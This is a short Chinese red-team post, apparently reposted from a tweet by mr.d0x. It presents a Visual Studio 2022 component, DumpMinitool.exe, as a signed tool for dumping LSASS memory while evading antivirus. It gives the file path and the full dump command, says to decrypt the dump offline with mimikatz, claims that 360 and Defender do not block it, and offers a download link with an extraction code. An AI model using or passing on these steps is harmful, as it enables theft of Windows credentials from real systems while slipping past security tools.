红队工具 | Visual Studio2022微软白名单免杀dump lsass的免杀工具
消息来源推特,推特博主:mr.d0x
https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=twOtT_clemvEYGQ9YdZ02w可以自行安装Visual Studio2022,然后访问路径,把工具拖出来使用即可,也可以直接在文末获取下载地址
转储 LSASS,该工具文件路径:
C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions文件名:DumpMinitool.exe
参数区分大小写
使用命令:
DumpMinitool.exe --file dump.txt --processId xxx --dumpType Full--file 输出的路径--processId lsass.exe进程的ID--dumpType 方式查看lsass进程ID
dump完成后,再使用mimikatz进行离线解密即可
mimikatz
微软的数字签名
免杀测试:360和Win10自带的defender杀软均不拦截。
沙箱检测
微步在线
下载地址:
链接:https://pan.baidu.com/s/18IRSjJaM4d2fwjmK9zfQFg
提取码:tfz4
点赞,转发,在看